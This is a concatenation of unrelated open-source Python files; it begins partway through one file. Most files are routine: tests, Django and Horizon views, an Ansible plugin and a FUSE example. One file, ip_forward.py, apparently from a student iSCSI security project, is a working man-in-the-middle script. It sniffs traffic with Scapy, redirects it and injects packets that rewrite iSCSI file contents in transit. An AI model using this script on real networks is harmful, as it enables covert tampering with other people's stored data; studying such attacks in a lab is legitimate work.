CONN.reply_http(req, "Too Many Connected. Try Later.")
else:
STATE.add(req)
CONN.reply_http(req, "", headers=HEADERS)
|
barneyElDinosaurio/thefuck
|
refs/heads/master
|
tests/rules/test_python_execute.py
|
17
|
import pytest
from thefuck.rules.python_execute import match, get_new_command
from tests.utils import Command
@pytest.mark.parametrize('command', [
Command(script='python foo'),
Command(script='python bar')])
def test_match(command):
assert match(command, None)
@pytest.mark.parametrize('command, new_command', [
(Command('python foo'), 'python foo.py'),
(Command('python bar'), 'python bar.py')])
def test_get_new_command(command, new_command):
assert get_new_command(command, None) == new_command
|
Erethon/synnefo
|
refs/heads/develop
|
snf-astakos-app/astakos/scripts/snf_service_export.py
|
9
|
import os
os.environ['DJANGO_SETTINGS_MODULE'] = 'synnefo.settings'
import sys
from optparse import OptionParser
from synnefo.lib.services import fill_endpoints, filter_public
from django.utils import simplejson as json
astakos_services = {
'astakos_account': {
'type': 'account',
'component': 'astakos',
'prefix': 'account',
'public': True,
'endpoints': [
{'versionId': 'v1.0',
'publicURL': None},
],
'resources': {
'pending_app': {
'desc': "Number of pending project applications",
'name': "astakos.pending_app",
'service_type': "account",
'service_origin': "astakos_account",
"ui_visible": False,
"api_visible": False},
},
},
'astakos_identity': {
'type': 'identity',
'component': 'astakos',
'prefix': 'identity',
'public': True,
'endpoints': [
{'versionId': 'v2.0',
'publicURL': None},
],
'resources': {},
},
'astakos_weblogin': {
'type': 'astakos_weblogin',
'component': 'astakos',
'prefix': 'weblogin',
'public': True,
'endpoints': [
{'versionId': '',
'publicURL': None},
],
},
'astakos_ui': {
'type': 'astakos_ui',
'component': 'astakos',
'prefix': 'ui',
'public': False,
'endpoints': [
{'versionId': '',
'publicURL': None},
],
},
'astakos_admin': {
'type': 'astakos_admin',
'component': 'astakos',
'prefix': 'admin',
'public': False,
'endpoints': [
{'versionId': '',
'publicURL': None},
],
'resources': {},
},
}
from astakos.oa2.services import oa2_services
astakos_services.update(oa2_services)
cyclades_services = {
'cyclades_compute': {
'type': 'compute',
'component': 'cyclades',
'prefix': 'compute',
'public': True,
'endpoints': [
{'versionId': 'v2.0',
'publicURL': None},
],
'resources': {
'vm': {
"name": "cyclades.vm",
"desc": "Number of virtual machines",
"service_type": "compute",
"service_origin": "cyclades_compute",
},
'total_cpu': {
"name": "cyclades.total_cpu",
"desc": "Number of virtual machine processors",
"service_type": "compute",
"service_origin": "cyclades_compute",
"ui_visible": False,
"api_visible": False,
},
'cpu': {
"name": "cyclades.cpu",
"desc": "Number of virtual machine processors of running"
" servers",
"service_type": "compute",
"service_origin": "cyclades_compute",
},
'total_ram': {
"name": "cyclades.total_ram",
"desc": "Virtual machine memory size",
"unit": "bytes",
"service_type": "compute",
"service_origin": "cyclades_compute",
"ui_visible": False,
"api_visible": False,
},
'ram': {
"name": "cyclades.ram",
"desc": "Virtual machine memory size of running servers",
"unit": "bytes",
"service_type": "compute",
"service_origin": "cyclades_compute",
},
'disk': {
"name": "cyclades.disk",
"desc": "Virtual machine disk size",
"unit": "bytes",
"service_type": "compute",
"service_origin": "cyclades_compute",
},
},
},
'cyclades_plankton': {
'type': 'image',
'component': 'cyclades',
'prefix': 'image',
'public': True,
'endpoints': [
{'versionId': 'v1.0',
'publicURL': None},
],
'resources': {},
},
'cyclades_network': {
'type': 'network',
'component': 'cyclades',
'prefix': 'network',
'public': True,
'endpoints': [
{'versionId': 'v2.0',
'publicURL': None},
],
'resources': {
'network-private': {
"name": "cyclades.network.private",
"desc": "Number of private networks",
"service_type": "network",
"service_origin": "cyclades_network",
},
'floating_ip': {
"name": "cyclades.floating_ip",
"desc": "Number of Floating IP addresses",
"service_type": "network",
"service_origin": "cyclades_network",
},
},
},
'cyclades_vmapi': {
'type': 'vmapi',
'component': 'cyclades',
'prefix': 'vmapi',
'public': True,
'endpoints': [
{'versionId': 'v1.0',
'publicURL': None},
],
'resources': {},
},
'cyclades_helpdesk': {
'type': 'cyclades_helpdesk',
'component': 'cyclades',
'prefix': 'helpdesk',
'public': False,
'endpoints': [
{'versionId': '',
'publicURL': None},
],
},
'cyclades_userdata': {
'type': 'cyclades_userdata',
'component': 'cyclades',
'prefix': 'userdata',
'public': False,
'endpoints': [
{'versionId': '',
'publicURL': None},
],
'resources': {},
},
'cyclades_ui': {
'type': 'cyclades_ui',
'component': 'cyclades',
'prefix': 'ui',
'public': False,
'endpoints': [
{'versionId': '',
'publicURL': None},
],
'resources': {},
},
'cyclades_admin': {
'type': 'admin',
'component': 'cyclades',
'prefix': 'admin',
'public': True,
'endpoints': [
{'versionId': '',
'publicURL': None},
],
'resources': {},
},
'cyclades_volume': {
'type': 'volume',
'component': 'cyclades',
'prefix': 'volume',
'public': True,
'endpoints': [
{'versionId': 'v2.0',
'publicURL': None},
],
'resources': {},
},
}
pithos_services = {
'pithos_object-store': {
'type': 'object-store',
'component': 'pithos',
'prefix': 'object-store',
'public': True,
'endpoints': [
{'versionId': 'v1',
'publicURL': None},
],
'resources': {
'diskspace': {
"desc": "Pithos account diskspace",
"name": "pithos.diskspace",
"unit": "bytes",
"service_type": "object-store",
"service_origin": "pithos_object-store",
},
},
},
'pithos_public': {
'type': 'pithos_public',
'component': 'pithos',
'prefix': 'public',
'public': False,
'endpoints': [
{'versionId': '',
'publicURL': None},
],
'resources': {},
},
'pithos_ui': {
'type': 'pithos_ui',
'component': 'pithos',
'prefix': 'ui',
'public': False,
'endpoints': [
{'versionId': '',
'publicURL': None},
],
'resources': {},
},
}
definitions = {
'astakos': astakos_services,
'cyclades': cyclades_services,
'pithos': pithos_services,
}
def print_definitions(d, base_url):
fill_endpoints(d, base_url)
print json.dumps(filter_public(d), indent=4)
usage = "usage: %prog <component_name> <base_url>"
parser = OptionParser(usage=usage)
def main():
(options, args) = parser.parse_args()
if len(args) != 2:
parser.error("Wrong number of arguments.")
component = args[0]
try:
services = definitions[component]
except KeyError:
print >> sys.stderr, "Unrecognized component %s" % component
exit(1)
base_url = args[1]
print_definitions(services, base_url)
if __name__ == '__main__':
main()
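# Usage sketch (illustrative; the base URLs are assumptions): print the public
# service/endpoint definitions of one component as JSON, e.g.
#
#   python snf_service_export.py astakos https://accounts.example.synnefo.org
#   python snf_service_export.py pithos https://storage.example.synnefo.org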
|
praveenaki/zulip
|
refs/heads/master
|
zerver/management/commands/rename_stream.py
|
116
|
from __future__ import absolute_import
from django.core.management.base import BaseCommand
from zerver.lib.actions import do_rename_stream
from zerver.models import Realm, get_realm
import sys
class Command(BaseCommand):
help = """Change the stream name for a realm."""
def add_arguments(self, parser):
parser.add_argument('domain', metavar='<domain>', type=str,
help="domain to operate on")
parser.add_argument('old_name', metavar='<old name>', type=str,
help='name of stream to be renamed')
parser.add_argument('new_name', metavar='<new name>', type=str,
help='new name to rename the stream to')
def handle(self, *args, **options):
domain = options['domain']
old_name = options['old_name']
new_name = options['new_name']
encoding = sys.getfilesystemencoding()
try:
realm = get_realm(domain)
except Realm.DoesNotExist:
print "Unknown domain %s" % (domain,)
exit(1)
do_rename_stream(realm, old_name.decode(encoding),
new_name.decode(encoding))
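# Usage sketch (illustrative; the invocation path is an assumption): run as a
# Django management command from the Zulip checkout, e.g.
#
#   ./manage.py rename_stream example.com "old stream name" "new stream name"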
|
diblaze/TDP002
|
refs/heads/master
|
Old Exams/201508/Uppgift5.py
|
1
|
#! /usr/bin/env python3
import random
import re
if __name__ == "__main__":
number = input("Mata in ett heltal: ")
number = int(number)
list_of_random_numbers = [format(random.randint(0, 59), "02") for x in range(number)]
print(list_of_random_numbers)
found = []
    notDone = True
    i = 0
    while notDone:
        if i + 1 >= len(list_of_random_numbers):
            notDone = False
            continue
        time = str(list_of_random_numbers[i]) + ":" + str(list_of_random_numbers[i+1])
        if re.match("^[0-2][1-3]:[0-5][0-9]$", time):
            found.append(time)
        i += 2
|
kang000feng/shadowsocks
|
refs/heads/master
|
utils/autoban.py
|
1033
|
#!/usr/bin/python
# -*- coding: utf-8 -*-
# Copyright (c) 2015 clowwindy
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
from __future__ import absolute_import, division, print_function, \
with_statement
import os
import sys
import argparse
if __name__ == '__main__':
parser = argparse.ArgumentParser(description='See README')
parser.add_argument('-c', '--count', default=3, type=int,
help='with how many failure times it should be '
'considered as an attack')
config = parser.parse_args()
ips = {}
banned = set()
for line in sys.stdin:
if 'can not parse header when' in line:
ip = line.split()[-1].split(':')[0]
if ip not in ips:
ips[ip] = 1
print(ip)
sys.stdout.flush()
else:
ips[ip] += 1
if ip not in banned and ips[ip] >= config.count:
banned.add(ip)
cmd = 'iptables -A INPUT -s %s -j DROP' % ip
print(cmd, file=sys.stderr)
sys.stderr.flush()
os.system(cmd)
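# Usage sketch (an assumption, not taken from the project's README): feed the
# shadowsocks server log to this script on stdin; it prints offending IPs and
# needs root so that the iptables command actually takes effect, e.g.
#
#   tail -F /var/log/shadowsocks.log | sudo python autoban.py --count 5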
|
agancsos/python
|
refs/heads/master
|
team_in_Python.py
|
1
|
team = {}
team["Lead"] = "t"
# Note: repeated assignments to the same key overwrite each other, so only the
# last "SR Analyst" entry survives in the dictionary.
team["SR Analyst"] = "Rob"
team["SR Analyst"] = "Usha"
team["SR Analyst"] = "Tom"
for title, person in team.iteritems():
    print person, ",", title
|
Illinois-tech-ITM/BSMP-2016-ISCSI-Packet-Injection
|
refs/heads/master
|
Scapy/ip_forward.py
|
2
|
#!/usr/bin/python
from scapy.all import *
import os
import sys
iface = "eth0"
filter = "ip"
#victim in this case is the initiator
VICTIM_IP = "192.168.1.190"
#The IP of this Kali Virtualbox system
MY_IP = "192.168.1.143"
# gateway is the target
TARGET_IP = "192.168.1.191"
#VICTIM_MAC = "### This is the MAC of this Kali virtual box - since its virtual it shouldn't change.###"
MY_MAC = "08:00:27:f2:ee:7c"
#target mac address
TARGET_MAC = "08:00:27:da:24:ee"
#initiator mac address
VICTIM_MAC = "08:00:27:26:ba:94"
def parse_to_hex(packet):
    # lines below are to redirect hexdump to a file so that we can use it in the python script again
stdout = sys.stdout
sys.stdout = open('packet.txt', 'w')
hexdump(packet)
sys.stdout.close()
sys.stdout = stdout
packet_str = open('packet.txt', 'r')
packet_hex = ''
#trimming the hexadecimal packet to get only the hexadecimal content
for line in packet_str:
hexline = line.split(' ')[1]
hexline = hexline.replace(' ', ' ')
packet_hex = packet_hex + ' ' + hexline
packet_str.close()
packet_hex = packet_hex.strip()
return packet_hex
def handle_packet(packet):
if (packet[IP].dst == TARGET_IP) and (packet[Ether].dst == MY_MAC):
# we change the packet destination to the target machine
packet[Ether].dst = TARGET_MAC
packet_hex = parse_to_hex(packet)
print packet_hex + "----"
# packets with destination to the target machine are just sent
os.system("echo '" + packet_hex + "' | hexinject -p -i eth0")
elif (packet[IP].dst == VICTIM_IP) and (packet[Ether].dst == MY_MAC):
# we change the packet destination to the initiator machine
packet[Ether].dst = VICTIM_MAC
packet_hex = parse_to_hex(packet)
print packet_hex + "----"
# if we find "Test ISCSI File" in hex in the packet, we modify it to "Test ISCSI Hack" and inject
if ('54 65 73 74 20 49 53 43 53 49 20 46 69 6C 65' in packet_hex):
packet_hex = packet_hex.replace("54 65 73 74 20 49 53 43 53 49 20 46 69 6C 65", "54 65 73 74 20 49 53 43 53 49 20 48 61 63 6B")
print "\n\n\nFOUND THE FILE CONTENT!\n\n\n"
os.system("echo '" + packet_hex + "' | hexinject -p -i eth0")
else: # else we just inject the original packet
os.system("echo '" + packet_hex + "' | hexinject -p -i eth0")
sniff(prn=handle_packet, filter=filter, iface=iface, count=0)
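# Worked example (illustration only): the two hex strings swapped above decode
# to the ASCII payloads being replaced on the wire:
#
#   '54 65 73 74 20 49 53 43 53 49 20 46 69 6C 65'.replace(' ', '').decode('hex')
#   # -> 'Test ISCSI File'
#   '54 65 73 74 20 49 53 43 53 49 20 48 61 63 6B'.replace(' ', '').decode('hex')
#   # -> 'Test ISCSI Hack'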
|
ginabythebay/camlistore
|
refs/heads/master
|
lib/python/fusepy/low-level/llfuse_example.py
|
21
|
#!/usr/bin/env python
'''
$Id: llfuse_example.py 46 2010-01-29 17:10:10Z nikratio $
Copyright (c) 2010, Nikolaus Rath <[email protected]>
All rights reserved.
Redistribution and use in source and binary forms, with or without modification, are permitted provided that the following conditions are met:
* Redistributions of source code must retain the above copyright notice, this list of conditions and the following disclaimer.
* Redistributions in binary form must reproduce the above copyright notice, this list of conditions and the following disclaimer in the documentation and/or other materials provided with the distribution.
* Neither the name of the main author nor the names of other contributors may be used to endorse or promote products derived from this software without specific prior written permission.
THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
'''
from __future__ import division, print_function, absolute_import
import llfuse
import errno
import stat
import sys
class Operations(llfuse.Operations):
'''A very simple example filesystem'''
def __init__(self):
super(Operations, self).__init__()
self.entries = [
# name, attr
(b'.', { 'st_ino': 1,
'st_mode': stat.S_IFDIR | 0755,
'st_nlink': 2}),
(b'..', { 'st_ino': 1,
'st_mode': stat.S_IFDIR | 0755,
'st_nlink': 2}),
(b'file1', { 'st_ino': 2, 'st_nlink': 1,
'st_mode': stat.S_IFREG | 0644 }),
(b'file2', { 'st_ino': 3, 'st_nlink': 1,
'st_mode': stat.S_IFREG | 0644 }) ]
self.contents = { # Inode: Contents
2: b'Hello, World\n',
3: b'Some more file contents\n'
}
self.by_inode = dict()
self.by_name = dict()
for entry in self.entries:
(name, attr) = entry
if attr['st_ino'] in self.contents:
attr['st_size'] = len(self.contents[attr['st_ino']])
self.by_inode[attr['st_ino']] = attr
self.by_name[name] = attr
def lookup(self, parent_inode, name):
try:
attr = self.by_name[name].copy()
except KeyError:
raise llfuse.FUSEError(errno.ENOENT)
attr['attr_timeout'] = 1
attr['entry_timeout'] = 1
attr['generation'] = 1
return attr
def getattr(self, inode):
attr = self.by_inode[inode].copy()
attr['attr_timeout'] = 1
return attr
def readdir(self, fh, off):
for entry in self.entries:
if off > 0:
off -= 1
continue
yield entry
def read(self, fh, off, size):
return self.contents[fh][off:off+size]
def open(self, inode, flags):
if inode in self.contents:
return inode
else:
raise RuntimeError('Attempted to open() a directory')
def opendir(self, inode):
return inode
def access(self, inode, mode, ctx, get_sup_gids):
return True
if __name__ == '__main__':
if len(sys.argv) != 2:
raise SystemExit('Usage: %s <mountpoint>' % sys.argv[0])
mountpoint = sys.argv[1]
operations = Operations()
llfuse.init(operations, mountpoint, [ b"nonempty", b'fsname=llfuses_xmp' ])
llfuse.main()
|
tersmitten/ansible
|
refs/heads/devel
|
lib/ansible/plugins/action/async_status.py
|
54
|
# Copyright: (c) 2018, Ansible Project
# GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)
from __future__ import (absolute_import, division, print_function)
__metaclass__ = type
from ansible.errors import AnsibleError
from ansible.plugins.action import ActionBase
from ansible.utils.vars import merge_hash
class ActionModule(ActionBase):
_VALID_ARGS = frozenset(('jid', 'mode'))
def run(self, tmp=None, task_vars=None):
results = super(ActionModule, self).run(tmp, task_vars)
del tmp # tmp no longer has any effect
if "jid" not in self._task.args:
raise AnsibleError("jid is required")
jid = self._task.args["jid"]
mode = self._task.args.get("mode", "status")
env_async_dir = [e for e in self._task.environment if
"ANSIBLE_ASYNC_DIR" in e]
if len(env_async_dir) > 0:
# for backwards compatibility we need to get the dir from
# ANSIBLE_ASYNC_DIR that is defined in the environment. This is
# deprecated and will be removed in favour of shell options
async_dir = env_async_dir[0]['ANSIBLE_ASYNC_DIR']
msg = "Setting the async dir from the environment keyword " \
"ANSIBLE_ASYNC_DIR is deprecated. Set the async_dir " \
"shell option instead"
self._display.deprecated(msg, "2.12")
else:
# inject the async directory based on the shell option into the
# module args
async_dir = self.get_shell_option('async_dir', default="~/.ansible_async")
module_args = dict(jid=jid, mode=mode, _async_dir=async_dir)
status = self._execute_module(task_vars=task_vars,
module_args=module_args)
results = merge_hash(results, status)
return results
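# Usage sketch (illustrative playbook snippet; task names and timings are
# assumptions): this action plugin backs the async_status module, typically
# used to poll a task that was started asynchronously:
#
#   - name: start long running job
#     command: /usr/bin/long_running_job
#     async: 3600
#     poll: 0
#     register: job
#
#   - name: wait for the job to finish
#     async_status:
#       jid: "{{ job.ansible_job_id }}"
#     register: result
#     until: result.finished
#     retries: 30
#     delay: 10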
|
zouyapeng/horizon
|
refs/heads/stable/juno
|
openstack_dashboard/dashboards/project/loadbalancers/views.py
|
10
|
# Copyright 2013, Big Switch Networks, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from django.core.urlresolvers import reverse_lazy
from django.utils.translation import ugettext_lazy as _
from horizon import exceptions
from horizon import forms
from horizon import messages
from horizon import tabs
from horizon.utils import memoized
from horizon import workflows
from openstack_dashboard import api
from openstack_dashboard.dashboards.project.loadbalancers \
import forms as project_forms
from openstack_dashboard.dashboards.project.loadbalancers \
import tabs as project_tabs
from openstack_dashboard.dashboards.project.loadbalancers \
import workflows as project_workflows
import re
class IndexView(tabs.TabView):
tab_group_class = (project_tabs.LoadBalancerTabs)
template_name = 'project/loadbalancers/details_tabs.html'
def post(self, request, *args, **kwargs):
obj_ids = request.POST.getlist('object_ids')
action = request.POST['action']
m = re.search('.delete([a-z]+)', action).group(1)
if obj_ids == []:
obj_ids.append(re.search('([0-9a-z-]+)$', action).group(1))
if m == 'monitor':
for obj_id in obj_ids:
try:
api.lbaas.pool_health_monitor_delete(request, obj_id)
messages.success(request, _('Deleted monitor %s') % obj_id)
except Exception as e:
exceptions.handle(request,
_('Unable to delete monitor. %s') % e)
if m == 'pool':
for obj_id in obj_ids:
try:
api.lbaas.pool_delete(request, obj_id)
messages.success(request, _('Deleted pool %s') % obj_id)
except Exception as e:
exceptions.handle(request,
_('Unable to delete pool. %s') % e)
if m == 'member':
for obj_id in obj_ids:
try:
api.lbaas.member_delete(request, obj_id)
messages.success(request, _('Deleted member %s') % obj_id)
except Exception as e:
exceptions.handle(request,
_('Unable to delete member. %s') % e)
if m == 'vip':
for obj_id in obj_ids:
try:
vip_id = api.lbaas.pool_get(request, obj_id).vip_id
except Exception as e:
exceptions.handle(request,
_('Unable to locate VIP to delete. %s')
% e)
if vip_id is not None:
try:
api.lbaas.vip_delete(request, vip_id)
messages.success(request, _('Deleted VIP %s') % vip_id)
except Exception as e:
exceptions.handle(request,
_('Unable to delete VIP. %s') % e)
return self.get(request, *args, **kwargs)
class AddPoolView(workflows.WorkflowView):
workflow_class = project_workflows.AddPool
class AddVipView(workflows.WorkflowView):
workflow_class = project_workflows.AddVip
def get_initial(self):
initial = super(AddVipView, self).get_initial()
initial['pool_id'] = self.kwargs['pool_id']
try:
pool = api.lbaas.pool_get(self.request, initial['pool_id'])
initial['subnet'] = api.neutron.subnet_get(
self.request, pool.subnet_id).cidr
except Exception as e:
initial['subnet'] = ''
msg = _('Unable to retrieve pool subnet. %s') % e
exceptions.handle(self.request, msg)
return initial
class AddMemberView(workflows.WorkflowView):
workflow_class = project_workflows.AddMember
class AddMonitorView(workflows.WorkflowView):
workflow_class = project_workflows.AddMonitor
class PoolDetailsView(tabs.TabView):
tab_group_class = (project_tabs.PoolDetailsTabs)
template_name = 'project/loadbalancers/details_tabs.html'
class VipDetailsView(tabs.TabView):
tab_group_class = (project_tabs.VipDetailsTabs)
template_name = 'project/loadbalancers/details_tabs.html'
class MemberDetailsView(tabs.TabView):
tab_group_class = (project_tabs.MemberDetailsTabs)
template_name = 'project/loadbalancers/details_tabs.html'
class MonitorDetailsView(tabs.TabView):
tab_group_class = (project_tabs.MonitorDetailsTabs)
template_name = 'project/loadbalancers/details_tabs.html'
class UpdatePoolView(forms.ModalFormView):
form_class = project_forms.UpdatePool
template_name = "project/loadbalancers/updatepool.html"
context_object_name = 'pool'
success_url = reverse_lazy("horizon:project:loadbalancers:index")
def get_context_data(self, **kwargs):
context = super(UpdatePoolView, self).get_context_data(**kwargs)
context["pool_id"] = self.kwargs['pool_id']
return context
@memoized.memoized_method
def _get_object(self, *args, **kwargs):
pool_id = self.kwargs['pool_id']
try:
return api.lbaas.pool_get(self.request, pool_id)
except Exception as e:
redirect = self.success_url
msg = _('Unable to retrieve pool details. %s') % e
exceptions.handle(self.request, msg, redirect=redirect)
def get_initial(self):
pool = self._get_object()
return {'name': pool['name'],
'pool_id': pool['id'],
'description': pool['description'],
'lb_method': pool['lb_method'],
'admin_state_up': pool['admin_state_up']}
class UpdateVipView(forms.ModalFormView):
form_class = project_forms.UpdateVip
template_name = "project/loadbalancers/updatevip.html"
context_object_name = 'vip'
success_url = reverse_lazy("horizon:project:loadbalancers:index")
def get_context_data(self, **kwargs):
context = super(UpdateVipView, self).get_context_data(**kwargs)
context["vip_id"] = self.kwargs['vip_id']
return context
@memoized.memoized_method
def _get_object(self, *args, **kwargs):
vip_id = self.kwargs['vip_id']
try:
return api.lbaas.vip_get(self.request, vip_id)
except Exception as e:
redirect = self.success_url
msg = _('Unable to retrieve VIP details. %s') % e
exceptions.handle(self.request, msg, redirect=redirect)
def get_initial(self):
vip = self._get_object()
persistence = getattr(vip, 'session_persistence', None)
if persistence:
stype = persistence['type']
if stype == 'APP_COOKIE':
cookie = persistence['cookie_name']
else:
cookie = ''
else:
stype = ''
cookie = ''
return {'name': vip['name'],
'vip_id': vip['id'],
'description': vip['description'],
'pool_id': vip['pool_id'],
'session_persistence': stype,
'cookie_name': cookie,
'connection_limit': vip['connection_limit'],
'admin_state_up': vip['admin_state_up']}
class UpdateMemberView(forms.ModalFormView):
form_class = project_forms.UpdateMember
template_name = "project/loadbalancers/updatemember.html"
context_object_name = 'member'
success_url = reverse_lazy("horizon:project:loadbalancers:index")
def get_context_data(self, **kwargs):
context = super(UpdateMemberView, self).get_context_data(**kwargs)
context["member_id"] = self.kwargs['member_id']
return context
@memoized.memoized_method
def _get_object(self, *args, **kwargs):
member_id = self.kwargs['member_id']
try:
return api.lbaas.member_get(self.request, member_id)
except Exception as e:
redirect = self.success_url
msg = _('Unable to retrieve member details. %s') % e
exceptions.handle(self.request, msg, redirect=redirect)
def get_initial(self):
member = self._get_object()
return {'member_id': member['id'],
'pool_id': member['pool_id'],
'weight': member['weight'],
'admin_state_up': member['admin_state_up']}
class UpdateMonitorView(forms.ModalFormView):
form_class = project_forms.UpdateMonitor
template_name = "project/loadbalancers/updatemonitor.html"
context_object_name = 'monitor'
success_url = reverse_lazy("horizon:project:loadbalancers:index")
def get_context_data(self, **kwargs):
context = super(UpdateMonitorView, self).get_context_data(**kwargs)
context["monitor_id"] = self.kwargs['monitor_id']
return context
@memoized.memoized_method
def _get_object(self, *args, **kwargs):
monitor_id = self.kwargs['monitor_id']
try:
return api.lbaas.pool_health_monitor_get(self.request, monitor_id)
except Exception as e:
redirect = self.success_url
msg = _('Unable to retrieve health monitor details. %s') % e
exceptions.handle(self.request, msg, redirect=redirect)
def get_initial(self):
monitor = self._get_object()
return {'monitor_id': monitor['id'],
'delay': monitor['delay'],
'timeout': monitor['timeout'],
'max_retries': monitor['max_retries'],
'admin_state_up': monitor['admin_state_up']}
class AddPMAssociationView(workflows.WorkflowView):
workflow_class = project_workflows.AddPMAssociation
def get_initial(self):
initial = super(AddPMAssociationView, self).get_initial()
initial['pool_id'] = self.kwargs['pool_id']
try:
pool = api.lbaas.pool_get(self.request, initial['pool_id'])
initial['pool_name'] = pool.name
initial['pool_monitors'] = pool.health_monitors
except Exception as e:
msg = _('Unable to retrieve pool. %s') % e
exceptions.handle(self.request, msg)
return initial
class DeletePMAssociationView(workflows.WorkflowView):
workflow_class = project_workflows.DeletePMAssociation
def get_initial(self):
initial = super(DeletePMAssociationView, self).get_initial()
initial['pool_id'] = self.kwargs['pool_id']
try:
pool = api.lbaas.pool_get(self.request, initial['pool_id'])
initial['pool_name'] = pool.name
initial['pool_monitors'] = pool.health_monitors
except Exception as e:
msg = _('Unable to retrieve pool. %s') % e
exceptions.handle(self.request, msg)
return initial
|
huwei/wechat-python-sdk
|
refs/heads/master
|
wechat_sdk/context/framework/django/backends/db.py
|
25
|
# -*- coding: utf-8 -*-
from django.db import IntegrityError, transaction, router
from django.utils import timezone
from wechat_sdk.context.framework.django.backends.base import ContextBase, CreateError
from wechat_sdk.context.framework.django.exceptions import SuspiciousOpenID
class ContextStore(ContextBase):
"""
    Database-backed storage for WeChat conversation context
"""
def __init__(self, openid):
super(ContextStore, self).__init__(openid)
def load(self):
try:
s = Context.objects.get(
openid=self.openid,
expire_date__gt=timezone.now()
)
return self.decode(s.context_data)
except (Context.DoesNotExist, SuspiciousOpenID) as e:
self.create(self.openid)
return {}
def exists(self, openid):
return Context.objects.filter(openid=openid).exists()
def create(self, openid):
self.save(must_create=True)
self.modified = True
self._session_cache = {}
return
def save(self, must_create=False):
obj = Context(
openid=self.openid,
context_data=self.encode(self._get_context(no_load=must_create)),
expire_date=self.get_expiry_date()
)
self.clear_expired()
using = router.db_for_write(Context, instance=obj)
try:
with transaction.atomic(using=using):
obj.save(force_insert=must_create, using=using)
except IntegrityError:
if must_create:
raise CreateError
raise
def delete(self, openid=None):
if openid is None:
openid = self.openid
try:
Context.objects.get(openid=openid).delete()
except Context.DoesNotExist:
pass
@staticmethod
def clear_expired():
Context.objects.filter(expire_date__lt=timezone.now()).delete()
from wechat_sdk.context.framework.django.models import Context
|
mKeRix/home-assistant
|
refs/heads/dev
|
homeassistant/components/bbb_gpio/switch.py
|
7
|
"""Allows to configure a switch using BeagleBone Black GPIO."""
import logging
import voluptuous as vol
from homeassistant.components import bbb_gpio
from homeassistant.components.switch import PLATFORM_SCHEMA
from homeassistant.const import CONF_NAME, DEVICE_DEFAULT_NAME
import homeassistant.helpers.config_validation as cv
from homeassistant.helpers.entity import ToggleEntity
_LOGGER = logging.getLogger(__name__)
CONF_PINS = "pins"
CONF_INITIAL = "initial"
CONF_INVERT_LOGIC = "invert_logic"
PIN_SCHEMA = vol.Schema(
{
vol.Required(CONF_NAME): cv.string,
vol.Optional(CONF_INITIAL, default=False): cv.boolean,
vol.Optional(CONF_INVERT_LOGIC, default=False): cv.boolean,
}
)
PLATFORM_SCHEMA = PLATFORM_SCHEMA.extend(
{vol.Required(CONF_PINS, default={}): vol.Schema({cv.string: PIN_SCHEMA})}
)
def setup_platform(hass, config, add_entities, discovery_info=None):
"""Set up the BeagleBone Black GPIO devices."""
pins = config[CONF_PINS]
switches = []
for pin, params in pins.items():
switches.append(BBBGPIOSwitch(pin, params))
add_entities(switches)
class BBBGPIOSwitch(ToggleEntity):
"""Representation of a BeagleBone Black GPIO."""
def __init__(self, pin, params):
"""Initialize the pin."""
self._pin = pin
self._name = params[CONF_NAME] or DEVICE_DEFAULT_NAME
self._state = params[CONF_INITIAL]
self._invert_logic = params[CONF_INVERT_LOGIC]
bbb_gpio.setup_output(self._pin)
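        # drive the pin to the configured initial state, honouring invert_logic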
if self._state is False:
bbb_gpio.write_output(self._pin, 1 if self._invert_logic else 0)
else:
bbb_gpio.write_output(self._pin, 0 if self._invert_logic else 1)
@property
def name(self):
"""Return the name of the switch."""
return self._name
@property
def should_poll(self):
"""No polling needed."""
return False
@property
def is_on(self):
"""Return true if device is on."""
return self._state
def turn_on(self, **kwargs):
"""Turn the device on."""
bbb_gpio.write_output(self._pin, 0 if self._invert_logic else 1)
self._state = True
self.schedule_update_ha_state()
def turn_off(self, **kwargs):
"""Turn the device off."""
bbb_gpio.write_output(self._pin, 1 if self._invert_logic else 0)
self._state = False
self.schedule_update_ha_state()
|
nghia-huynh/gem5-stable
|
refs/heads/master
|
src/mem/slicc/symbols/__init__.py
|
82
|
